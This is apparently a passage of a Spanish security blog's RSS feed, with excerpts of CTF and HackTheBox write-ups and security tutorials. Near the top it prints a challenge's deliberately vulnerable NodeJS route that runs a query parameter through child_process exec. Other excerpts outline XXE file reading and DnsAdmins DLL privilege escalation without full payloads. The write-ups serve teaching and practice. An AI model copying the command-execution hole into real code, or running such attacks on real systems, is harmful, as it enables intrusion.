&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_unfurl/snyk_fetch_the_flag_unfurl_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_unfurl/snyk_fetch_the_flag_unfurl_001.webp" alt="Snyk Fetch The Flag - Unfurl" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Un análisis rápido del código fuente revela que la aplicación está desarrollada en &lt;strong&gt;NodeJS&lt;/strong&gt;, y el uso del módulo &lt;code&gt;child_process&lt;/code&gt; sugiere la posibilidad de una &lt;strong&gt;ejecución remota de comandos (RCE)&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;📄 Archivo &lt;code&gt;adminRoutes.js&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;exec&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;child_process&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/execute&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;// This isn&amp;#39;t terribly secure, but we&amp;#39;re only going to bind this app to the localhost so you&amp;#39;d need to be on the actual host to run any commands.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;&lt;/span&gt; &lt;span class="c1"&gt;// So I think we&amp;#39;re good!
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;&lt;/span&gt; &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;clientIp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;// Definitely making sure to lock this down to the localhost
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;clientIp&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;127.0.0.1&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;clientIp&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;::1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;warn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sb"&gt;`[WARN] Unauthorized access attempt from &lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;clientIp&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;403&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Forbidden: Access is restricted to localhost.&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cmd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;400&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;No command provided!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nx"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sb"&gt;`[ERROR] Command execution failed: &lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sb"&gt;`Error: &lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sb"&gt;`[INFO] Command executed: &lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sb"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sb"&gt; &amp;lt;h1&amp;gt;Command Output&amp;lt;/h1&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sb"&gt; &amp;lt;pre&amp;gt;&lt;/span&gt;&lt;span class="si"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;stderr&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sb"&gt;&amp;lt;/pre&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sb"&gt; &amp;lt;a href=&amp;#34;/admin&amp;#34;&amp;gt;Back to Admin Panel&amp;lt;/a&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sb"&gt; `&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;El código indica que la aplicación permite ejecutar comandos en el endpoint &lt;code&gt;/execute&lt;/code&gt; a través del parámetro &lt;code&gt;cmd&lt;/code&gt;, pero solo &lt;strong&gt;localmente&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - Zero Ex Six One</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-zero-ex-six-one/</link><pubDate>Sun, 02 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-zero-ex-six-one/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_zero_ex_six_one/snyk_fetch_the_flag_zero_ex_six_one_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_zero_ex_six_one/snyk_fetch_the_flag_zero_ex_six_one_banner.webp" alt="Snyk Fetch The Flag - Zero Ex Six One" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En este desafío obtenemos un archivo llamado &lt;code&gt;flag.txt.encry&lt;/code&gt;, el cual contiene una cadena en formato hexadecimal.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ cat flag.txt.encry
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;0x070x0d0x000x060x1a0x020x540x510x050x590x530x020x510x000x530x540x070x520x040x570x550x550x050x510x560x510x530x030x550x500x050x030x050x510x590x540x000x1c
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;La 💡 pista en la descripción del reto sugiere que se ha utilizado un cifrado &lt;strong&gt;XOR&lt;/strong&gt;, y el título del desafío, &lt;strong&gt;Zero Ex Six One&lt;/strong&gt;, podría indicar que la clave de cifrado es &lt;code&gt;0x61&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-txt" data-lang="txt"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;I&amp;#39;m XORta out of ideas for how to get the flag. Does this look like anything to you?
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="solución-1---usando-la-clave-de-cifrado"&gt;Solución 1 - Usando la clave de cifrado&lt;/h2&gt;
&lt;p&gt;En esta primera solución, &lt;strong&gt;convertimos la cadena hexadecimal en bytes&lt;/strong&gt; y aplicamos un &lt;strong&gt;cifrado XOR&lt;/strong&gt; con la clave 🔑 &lt;code&gt;0x61&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>HTB Machine BountyHunter</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/bountyhunter-writeup/</link><pubDate>Sat, 20 Nov 2021 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/bountyhunter-writeup/</guid><description>&lt;p&gt;&lt;a href="images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png"&gt;&lt;img src="images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png" alt="Hack The Box - Machine - BountyHunter" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="descripción-general"&gt;Descripción general&lt;/h1&gt;
&lt;p&gt;Bienvenido al writeup de la máquina &lt;strong&gt;bountyhunter&lt;/strong&gt; de la plataforma Hack The Box. BountyHunter es una máquina Linux que estuvo activa desde el 24 de julio hasta el 20 de noviembre. En esta máquina encontraremos una vulnerabilidad XXE que usaremos junto con un wrapper PHP para leer ficheros internos y obtener información sensible. Con la información obtenida nos conectaremos por SSH y una vez dentro analizaremos un script Python para descubrir cómo abusarlo y conseguir ejecución de código como root.&lt;/p&gt;</description></item><item><title>HTB Machine Explore</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/explore-writeup/</link><pubDate>Sat, 30 Oct 2021 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/explore-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/htb-machine-explore/htb-machine-explore_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/htb-machine-explore/htb-machine-explore_banner.webp" alt="Hack The Box - Machine - Explore" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Bienvenido al writeup de la máquina &lt;strong&gt;explore&lt;/strong&gt; de la plataforma Hack The Box. Explore es una máquina Android de dificultad &lt;strong&gt;fácil&lt;/strong&gt;.&lt;/p&gt;
&lt;h1 id="antes-de-empezar"&gt;Antes de empezar&lt;/h1&gt;
&lt;p&gt;Conectamos a la &lt;strong&gt;VPN de Hack The Box&lt;/strong&gt; en segundo plano con &lt;code&gt;TMUX&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;tmux new -s htb
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo openvpn ~/.vpn/htb.ovpn
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Añadimos&lt;/strong&gt; la máquina al fichero &lt;code&gt;/etc/hosts&lt;/code&gt;, &lt;strong&gt;comprobamos la conexión&lt;/strong&gt; con &lt;code&gt;ping&lt;/code&gt; y &lt;strong&gt;creamos las carpetas de trabajo&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;10.10.10.247 explore.htb&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; /etc/hosts
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ping -c &lt;span class="m"&gt;4&lt;/span&gt; explore.htb
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mkdir -p ~/htb/explorer.htb/&lt;span class="o"&gt;{&lt;/span&gt;exploits,fuzz,http,nmap&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h1 id="reconocimiento"&gt;Reconocimiento&lt;/h1&gt;
&lt;p&gt;Comprobamos &lt;strong&gt;todos los puertos abiertos&lt;/strong&gt;, detectamos el servicio y su versión con &lt;code&gt;nmap&lt;/code&gt;&lt;/p&gt;</description></item><item><title>No, Facebook no ha sido hackeado ni ha tenido una brecha de seguridad</title><link>https://hackpuntes.com/es/posts/no-facebook-no-ha-sido-hackeado-ni-ha-tenido-una-brecha-de-seguridad/</link><pubDate>Mon, 05 Apr 2021 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/no-facebook-no-ha-sido-hackeado-ni-ha-tenido-una-brecha-de-seguridad/</guid><description>&lt;p&gt;Recientemente, ha saltado una noticia en diversos medios de comunicación y RRSS sobre una supuesta brecha de seguridad en Facebook que expondría la información de &lt;strong&gt;533 millones de personas&lt;/strong&gt; de todo el mundo, en concreto, sus números telefónicos y direcciones.&lt;/p&gt;
&lt;p&gt;Esta entrada tiene como finalidad &lt;strong&gt;dar a conocer el impacto real&lt;/strong&gt; de dicha brecha de seguridad (desde mi punto de vista) a aquellos usuarios que no tienen la posibilidad de acceder a ella o han sido mal informados por ciertos medios de comunicación o «Gurús» de la ciberseguridad de este país.&lt;/p&gt;</description></item><item><title>Crear tu propia VPN sin logs</title><link>https://hackpuntes.com/es/posts/create-your-own-log-free-vpn/</link><pubDate>Tue, 24 Nov 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/create-your-own-log-free-vpn/</guid><description>&lt;p&gt;Bienvenidos a este tutorial sobre como montar nuestra propia &lt;strong&gt;VPN sin logs&lt;/strong&gt; mediante la configuración de un servidor &lt;strong&gt;OpenVPN&lt;/strong&gt; en una máquina en la nube.&lt;/p&gt;
&lt;p&gt;Antes de empezar con el tutorial, deberemos de crear una máquina en la nube, yo he usado el &lt;strong&gt;VPS de DigitalOcean&lt;/strong&gt; en el cual tengo una máquina Ubuntu 20.04 por 5$ al mes, puedes usar el siguiente &lt;a href="https://m.do.co/c/67dd38080d62" target="_blank" rel="noopener noreferrer"&gt;enlace&lt;/a&gt;
 para obtener &lt;strong&gt;100$&lt;/strong&gt; gratis.&lt;/p&gt;
&lt;h2 id="crear-una-máquina-en-la-nube"&gt;Crear una máquina en la nube&lt;/h2&gt;
&lt;p&gt;Como he comentado al principio, he elegido DigitalOcean como VPS, pero existen otros como Linode, Azure o AWS. Para crear una máquina Ubuntu 20.04 deberemos de ir a la parte superior derecha de nuestro panel y seleccionar &lt;strong&gt;Create -&amp;gt; Droplets&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>reNgine – Framework de reconocimiento automatizado para aplicaciones web</title><link>https://hackpuntes.com/es/posts/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/</link><pubDate>Mon, 19 Oct 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/</guid><description>&lt;h2 id="1-sobre-rengine"&gt;1. Sobre reNgine&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_001.webp" alt="reNgine – Framework de reconocimiento automatizado para aplicaciones web" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Dashboard de la aplicación reNgine&lt;/p&gt;
&lt;p&gt;reNgine es un &lt;strong&gt;framework de reconocimineto automatizado para aplicaciones web&lt;/strong&gt; utilizado para realizar la fase de recopilación de información durante las auditorías, cuenta con varios motores de escaneo personalizables que pueden ayudarnos para:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Escanear puertos en los servidores de aplicaciones.&lt;/li&gt;
&lt;li&gt;Enumerar subdominios.&lt;/li&gt;
&lt;li&gt;Buscar directorios y archivos.&lt;/li&gt;
&lt;li&gt;Encontrar endpoints.&lt;/li&gt;
&lt;li&gt;Tomar capturas de pantalla.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_002.webp"&gt;&lt;img src="https://hackpuntes.com/images/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web/rengine-framework-de-reconocimiento-automatizado-para-aplicaciones-web_002.webp" alt="reNgine – Framework de reconocimiento automatizado para aplicaciones web" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Escalada de privilegios en Windows mediante grupo Administradores de DNS</title><link>https://hackpuntes.com/es/posts/escalada-de-privilegios-en-windows-mediante-grupo-administradores-de-dns/</link><pubDate>Thu, 16 Apr 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/escalada-de-privilegios-en-windows-mediante-grupo-administradores-de-dns/</guid><description>&lt;p&gt;Cuando tomamos el control de una máquina, el siguiente paso es la &lt;strong&gt;escalada de privilegios&lt;/strong&gt; para hacernos con el control total de ella. En la siguiente entrada, veremos como conseguirlo aprovechándonos del &lt;strong&gt;grupo de administradores DNS&lt;/strong&gt; y la inyección de una dll maliciosa.&lt;/p&gt;
&lt;h2 id="pasos-a-seguir"&gt;Pasos a seguir&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Comprobar que el usuario comprometido forma parte del grupo de administradores DNS.&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;whoami /all
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;a href="https://hackpuntes.com/images/escalada-de-privilegios-en-windows-mediante-grupo-administradores-de-dns/escalada-de-privilegios-en-windows-mediante-grupo-administradores-de-dns_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/escalada-de-privilegios-en-windows-mediante-grupo-administradores-de-dns/escalada-de-privilegios-en-windows-mediante-grupo-administradores-de-dns_001.webp" alt="Escalada de privilegios en Windows mediante grupo Administradores de DNS" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Enviar tráfico de Burp Suite a través de VPS</title><link>https://hackpuntes.com/es/posts/enviar-trafico-de-burp-suite-a-traves-de-vps/</link><pubDate>Mon, 13 Apr 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/enviar-trafico-de-burp-suite-a-traves-de-vps/</guid><description>&lt;p&gt;Cuando estamos auditando una aplicación externa con Burp Suite, podemos encontrarnos en un entorno con restricciones de red, por ejemplo, un firewall podría interferir en nuestros paquetes y descartarlos o modificarlos, lo que daría como resultado falsos positivos o la anulación de ciertas pruebas de seguridad.&lt;/p&gt;
&lt;p&gt;En esta entrada, veremos como &lt;strong&gt;enviar el tráfico del proxy de Burp Suite a través de una máquina linux en la nube (VPS)&lt;/strong&gt; para evitar estos problemas u otros similares.&lt;/p&gt;</description></item><item><title>Creación de un bot en Telegram para notificar conexiones por SSH</title><link>https://hackpuntes.com/es/posts/creacion-de-un-bot-en-telegram-para-notificar-conexiones-por-ssh/</link><pubDate>Thu, 09 Apr 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/creacion-de-un-bot-en-telegram-para-notificar-conexiones-por-ssh/</guid><description>&lt;p&gt;Ahora que estamos más tiempo en casa debido a la situación excepcional que vivimos a causa del Covid-19, podemos aprovechar e intentar agregar algún tipo de seguridad en nuestra red interna, por eso pense en escribir este breve post, tan sencillo como útil… la de notificarnos cuando alguien accede a uno de nuestros dispositivos.&lt;/p&gt;
&lt;p&gt;En este artículo, vamos a crear un bot de Telegram que nos avise cada vez que se inicie sesión por SSH en alguno de nuestros dispositivos (para este ejemplo, usaré mi Raspberry).&lt;/p&gt;</description></item><item><title>Añadir CA de Burp Suite al almacén de certificados de Kali Linux</title><link>https://hackpuntes.com/es/posts/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/</link><pubDate>Sun, 29 Mar 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/</guid><description>&lt;p&gt;Durante un programa privado de bug bounty, estuve utilizando las herramientas cURL, gobuster y sqlmap a través del proxy de Burp Suite. Como siempre y por vagancia, configuraba las herramientas para que ignoraran el certificado de PortSwigger (por ejemplo, la opción &lt;code&gt;-k&lt;/code&gt; en cURL).&lt;/p&gt;
&lt;p&gt;En caso de no añadir opciones de ignorar certificados a nuestras herramientas, podemos obtener errores del tipo &lt;strong&gt;SSL certificate problem&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux/anadir-ca-de-burp-suite-al-almacen-de-certificados-de-kali-linux_001.webp" alt="Añadir CA de Burp Suite al almacén de certificados de Kali Linux" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
